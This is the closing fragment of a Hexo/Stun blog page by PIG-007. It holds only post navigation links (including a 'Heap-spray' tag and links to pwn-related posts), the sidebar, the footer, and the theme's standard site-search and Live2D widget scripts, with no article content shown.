fa-tag"></i></span><a class="post-tags-item__link" href="http://pig-007.github.io/tags/Heap-spray/">Heap-spray</a></span></div><nav class="post-paginator paginator"><div class="paginator-prev"><a class="paginator-prev__link" href="/2021/08/19/%E5%A0%86%E5%89%8D%E7%BD%AE%E7%9F%A5%E8%AF%86%E6%80%BB%E7%BB%93/"><span class="paginator-prev__icon"><i class="fas fa-angle-left"></i></span><span class="paginator-prev__text">堆前置知识总结</span></a></div><div class="paginator-next"><a class="paginator-next__link" href="/2021/08/18/pwn-kernel_%E5%B8%B8%E8%A7%81%E6%8F%90%E6%9D%83%E6%89%8B%E6%AE%B5/"><span class="paginator-prev__text">pwn-kernel_常见提权手段</span><span class="paginator-next__icon"><i class="fas fa-angle-right"></i></span></a></div></nav></footer></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><div class="sidebar-nav"><span class="sidebar-nav-toc current">Catalog</span><span class="sidebar-nav-ov">Overview</span></div><section class="sidebar-toc"></section><!-- ov = overview--><section class="sidebar-ov hide"><div class="sidebar-ov-author"><div class="sidebar-ov-author__avatar"><img class="sidebar-ov-author__avatar_img" src="https://pig-007.oss-cn-beijing.aliyuncs.com/typoraImgsauthor.jpg" alt="avatar"></div><p class="sidebar-ov-author__text">The way forward</p></div><div class="sidebar-ov-state"><a class="sidebar-ov-state-item sidebar-ov-state-item--posts" href="/archives/"><div class="sidebar-ov-state-item__count">118</div><div class="sidebar-ov-state-item__name">Archives</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--categories" href="/categories/"><div class="sidebar-ov-state-item__count">62</div><div class="sidebar-ov-state-item__name">Categories</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--tags" href="/tags/"><div class="sidebar-ov-state-item__count">60</div><div class="sidebar-ov-state-item__name">Tags</div></a></div><div class="sidebar-ov-cc"><a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" target="_blank" rel="noopener" data-popover="Creative Commons" data-popover-pos="up"><img src="/images/cc-by-nc-sa.svg"></a></div></section><div class="sidebar-reading"><div class="sidebar-reading-info"><span class="sidebar-reading-info__text">You have read </span><span class="sidebar-reading-info__num">0</span><span class="sidebar-reading-info__perc">%</span></div><div class="sidebar-reading-line"></div></div></aside></div><div class="clearfix"></div></div></main><footer class="footer" id="footer"><div class="footer-inner"><div><span>Copyright © 2022</span><span class="footer__icon"><i class="fas fa-heart"></i></span><span>PIG-007</span></div><div><span>Powered by <a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a></span><span> v5.4.0</span><span class="footer__devider">|</span><span>Theme - <a href="https://github.com/liuyib/hexo-theme-stun/" title="Stun" target="_blank" rel="noopener">Stun</a></span><span> v2.6.2</span></div></div></footer><div class="loading-bar" id="loading-bar"><div class="loading-bar__progress"></div></div><div class="back2top" id="back2top"><span class="back2top__icon"><i class="fas fa-rocket"></i></span></div></div><div class="search-mask"></div><div class="search-popup"><span class="search-close"></span><div class="search-input"><input placeholder="Search for Posts (Support multiple keywords)"></div><div class="search-results"></div></div><script src="https://cdn.jsdelivr.net/npm/jquery@v3.4.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.ui.min.js"></script><script>function initSearch() {
  var isXML = true;
  var search_path = 'search.json';

  if (!search_path) {
    search_path = 'search.xml';
  } else if (/json$/i.test(search_path)) {
    isXML = false;
  }

  var path = '/' + search_path;
  $.ajax({
    url: path,
    dataType: isXML ? 'xml' : 'json',
    async: true,
    success: function (res) {
      var datas = isXML ? $('entry', res).map(function () {
        // 将 XML 转为 JSON
        return {
          title: $('title', this).text(),
          content: $('content', this).text(),
          url: $('url', this).text()
        };
      }).get() : res;
      var $input = $('.search-input input');
      var $result = $('.search-results');
      // 搜索对象（标题、内容）的权重，影响显示顺序
      var WEIGHT = { title: 100, content: 1 };
      var searchPost = function () {
        var searchText = $input.val().toLowerCase().trim();
        // 根据空白字符分隔关键字
        var keywords = searchText.split(/[\s]+/);
        // 搜索结果
        var matchPosts = [];

        // 有多个关键字时，将原文字整个保存下来
        if (keywords.length > 1) {
          keywords.push(searchText);
        }
        // 防止未输入字符时搜索
        if (searchText.length > 0) {
          datas.forEach(function (data) {
            var isMatch  = false;
            // 没有标题的文章使用预设的 i18n 变量代替
            var title = (data.title && data.title.trim()) || '[ Untitled ]';
            var titleLower = title && title.toLowerCase();
            // 删除 HTML 标签 和 所有空白字符
            var content = data.content && data.content.replace(/<[^>]+>/g, '');
            var contentLower = content && content.toLowerCase();
            // 删除重复的 /
            var postURL = data.url && decodeURI(data.url).replace(/\/{2,}/g, '/');
            // 标题中匹配到的关键词
            var titleHitSlice = [];
            // 内容中匹配到的关键词
            var contentHitSlice = [];

            keywords.forEach(function (keyword) {
              /**
              * 获取匹配的关键词的索引
              * @param {String} keyword 要匹配的关键字
              * @param {String} text 原文字
              * @param {Boolean} caseSensitive 是否区分大小写
              * @param {Number} weight 匹配对象的权重。权重大的优先显示
              * @return {Array}
              */
              function getIndexByword (word, text, caseSensitive, weight) {
                if (!word || !text) {
                  return [];
                };

                var startIndex = 0; // 每次匹配的开始索引
                var index = -1;     // 匹配到的索引值
                var result = [];    // 匹配结果

                if (!caseSensitive) {
                  word = word.toLowerCase();
                  text = text.toLowerCase();
                }

                while((index = text.indexOf(word, startIndex)) !== -1) {
                  var hasMatch = false;
                  // 索引位置相同的关键词，保留长度较长的
                  titleHitSlice.forEach(function (hit) {
                    if (hit.index === index && hit.word.length < word.length) {
                      hit.word = word;
                      hasMatch = true;
                    }
                  });
                  startIndex = index + word.length;
                  !hasMatch && result.push({ index: index, word: word, weight: weight });
                }
                return result;
              }
              titleHitSlice = titleHitSlice.concat(getIndexByword(keyword, titleLower, false, WEIGHT.title));
              contentHitSlice = contentHitSlice.concat(getIndexByword(keyword, contentLower, false, WEIGHT.content));
            });

            var hitTitle = titleHitSlice.length;
            var hitContent = contentHitSlice.length;

            if (hitTitle > 0 || hitContent > 0) {
              isMatch = true;
            }
            if (isMatch) {
              ;[titleHitSlice, contentHitSlice].forEach(function (hit) {
                // 按照匹配文字的索引的递增顺序排序
                hit.sort(function (left, right) {
                  return left.index - right.index;
                });
              });
              /**
              * 给文本中匹配到的关键词添加标记，从而进行高亮显示
              * @param {String} text 原文本
              * @param {Array} hitSlice 匹配项的索引信息
              * @param {Number} start 开始索引
              * @param {Number} end 结束索引
              * @return {String}
              */
              function highlightKeyword (text, hitSlice, start, end) {
                if (!text || !hitSlice || !hitSlice.length) {
                  return;
                }

                var result = '';
                var startIndex = start;
                var endIndex = end;
                hitSlice.forEach(function (hit) {
                  if (hit.index < startIndex) {
                    return;
                  }

                  var hitWordEnd = hit.index + hit.word.length;
                  result += text.slice(startIndex, hit.index);
                  result += '<b>' + text.slice(hit.index, hitWordEnd) + '</b>';
                  startIndex = hitWordEnd;
                });
                result += text.slice(startIndex, endIndex);
                return result;
              }

              var postData = {};
              // 文章总的搜索权重
              var postWeight = titleHitSlice.length * WEIGHT.title + contentHitSlice.length * WEIGHT.content;
              // 标记匹配关键词后的标题
              var postTitle = highlightKeyword(title, titleHitSlice, 0, title.length) || title;
              // 标记匹配关键词后的内容
              var postContent;
              // 显示内容的长度
              var SHOW_WORD_LENGTH = 200;
              // 命中关键词前的字符显示长度
              var SHOW_WORD_FRONT_LENGTH = 20;
              var SHOW_WORD_END_LENGTH = SHOW_WORD_LENGTH - SHOW_WORD_FRONT_LENGTH;

              // 截取匹配的第一个字符，前后共 200 个字符来显示
              if (contentHitSlice.length > 0) {
                var firstIndex = contentHitSlice[0].index;
                var start = firstIndex > SHOW_WORD_FRONT_LENGTH ? firstIndex - SHOW_WORD_FRONT_LENGTH : 0;
                var end = firstIndex + SHOW_WORD_END_LENGTH;
                postContent = highlightKeyword(content, contentHitSlice, start, end);
              } else { // 未匹配到内容，直接截取前 200 个字符来显示
                postContent = content.slice(0, SHOW_WORD_LENGTH);
              }
              postData.title = postTitle;
              postData.content = postContent;
              postData.url = postURL;
              postData.weight = postWeight;
              matchPosts.push(postData);
            }
          });
        }

        var resultInnerHtml = '';
        if (matchPosts.length) {
          // 按权重递增的顺序排序，使权重大的优先显示
          matchPosts.sort(function (left, right) {
            return right.weight - left.weight;
          });
          resultInnerHtml += '<ul>';
          matchPosts.forEach(function (post) {
            resultInnerHtml += '<li><a class="search-results-title" href="' + post.url + '">';
            resultInnerHtml += post.title;
            resultInnerHtml += '</a><div class="search-results-content">';
            resultInnerHtml += post.content;
            resultInnerHtml += '</div></li>';
          });
          resultInnerHtml += '</ul>';
        } else {
          resultInnerHtml += '<div class="search-results-none"><i class="far fa-meh"></i></div>';
        }
        $result.html(resultInnerHtml);
      };
      $input.on('input', searchPost);
      $input.on('keyup', function (e) {
        if (e.keyCode === Stun.utils.codeToKeyCode('Enter')) {
          searchPost();
        }
      });
    }
  });
}

function closeSearch () {
  $('body').css({ overflow: 'auto' });
  $('.search-popup').css({ display: 'none' });
  $('.search-mask').css({ display: 'none' });
}

window.addEventListener('DOMContentLoaded', function () {
  Stun.utils.pjaxReloadLocalSearch = function () {
    $('.header-nav-search').on('click', function (e) {
      e.stopPropagation();
      $('body').css('overflow', 'hidden');
      $('.search-popup')
        .velocity('stop')
        .velocity('transition.expandIn', {
          duration: 300,
          complete: function () {
            $('.search-popup input').focus();
          }
        });
      $('.search-mask')
        .velocity('stop')
        .velocity('transition.fadeIn', {
          duration: 300
        });

      initSearch();
    });
    $('.search-mask, .search-close').on('click', function () {
      closeSearch();
    });
    $(document).on('keydown', function (e) {
      // Escape <=> 27
      if (e.keyCode === Stun.utils.codeToKeyCode('Escape')) {
        closeSearch();
      }
    });
  };

  Stun.utils.pjaxReloadLocalSearch();
}, false);

function safeOpenUrl(url) {
  var newTab = window.open();
  newTab.opener = null;
  newTab.location = url;
}

function extSearch(engine) {
  var engines = {
    google: 'https://www.google.com/search?q=',
    bing: 'https://cn.bing.com/search?q=',
    baidu: 'https://www.baidu.com/s?ie=UTF-8&wd=',
  };
  var host = window.location.host;
  var query = $('.search-input input').val().toLowerCase().trim();
  var uri = engines[engine] + query + ' site:' + host;

  if (query) {
    safeOpenUrl(uri);
  } else {
    Stun.utils.popAlert('warning', 'Please enter characters');
  }
}

var assistSearchList = window.CONFIG.assistSearch;

if (Array.isArray(assistSearchList)) {
  assistSearchList.forEach(function (name) {
    document.querySelector('.search-btns-item--' + name).addEventListener('click', function () {
      extSearch(name);
    }, false);
  });
}</script><script src="/js/utils.js?v=2.6.2"></script><script src="/js/stun-boot.js?v=2.6.2"></script><script src="/js/scroll.js?v=2.6.2"></script><script src="/js/header.js?v=2.6.2"></script><script src="/js/sidebar.js?v=2.6.2"></script><script type="application/json" src="/search.json"></script><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"scale":1,"hHeadPos":0.5,"vHeadPos":0.618,"jsonPath":"/live2dw/assets/assets/wanko.model.json"},"display":{"superSample":2,"width":150,"height":300,"position":"left","hOffset":0,"vOffset":-80},"mobile":{"show":true,"scale":0.5},"react":{"opacityDefault":0.7,"opacityOnHover":0.8},"log":false});</script></body></html>